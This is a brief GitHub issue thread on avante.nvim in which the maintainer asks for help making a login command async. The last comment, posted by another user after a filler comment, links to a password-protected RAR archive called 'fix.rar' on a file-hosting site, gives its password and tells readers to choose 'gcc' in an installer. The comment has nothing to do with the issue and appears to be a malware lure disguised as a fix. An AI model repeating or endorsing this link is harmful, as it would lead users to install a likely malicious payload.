### ISSUE TITLE
perf: make login cmd async

### ISSUE THREAD

**Issue by aarnphm** [yetone/avante.nvim#253]
https://github.com/yetone/avante.nvim/blob/main/lua/avante/providers/init.lua#L100

If anyone knows how to run this async feel free to open a PR

**Comment by amir1387aht** [comment]
dwd

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
